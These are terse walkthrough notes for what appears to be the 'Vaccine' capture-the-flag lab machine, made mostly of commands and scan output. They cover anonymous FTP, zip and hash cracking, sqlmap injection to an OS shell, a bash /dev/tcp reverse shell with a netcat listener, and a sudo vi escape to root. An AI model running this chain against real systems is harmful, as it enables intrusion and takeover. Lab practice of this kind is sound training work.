Vaccine

#Linux #FTP #SQL #SUID

nmap -sV -sC <target_ip>
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-19 00:59 WIB
Nmap scan report for <target_ip>
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.15.153
|      Logged in as ftpuser
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxr-xr-x    1 0        0            2533 Apr 13  2021 backup.zip
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: MegaCorp Login
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.13 seconds
ftp <target_ip>

anonymous

ls
get backup.zip
zip2john backup.zip > cracked
john cracked
hashid 2cb42f8734ea607eefed3b70af13bbd3
echo 2cb42f8734ea607eefed3b70af13bbd3 > hash
hashcat -a 0 -m 0 hash /usr/share/wordlist/rockyou.txt
sqlmap -u 'http://<target_ip>/dashboard.php?search=a' --cookie="PHPSESSID=tra9r85r0n2sfddee3h7h0l1l4"
sqlmap -u 'http://<target_ip>/dashboard.php?search=a' --cookie="PHPSESSID=tra9r85r0n2sfddee3h7h0l1l4" --os-shell

buat listener

sudo nc -lvnp 443
bash -c "bash -i >& /dev/tcp/{your_IP}/443 0>&1"
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm

/var/www/html/dashboard.php

user=postgres
password=P@s5w0rd!

ssh postgres@<ip_target>

https://gtfobins.github.io/gtfobins/vi/#sudo

sudo -l
sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf
:set shell=/bin/sh
:shell
whoami

done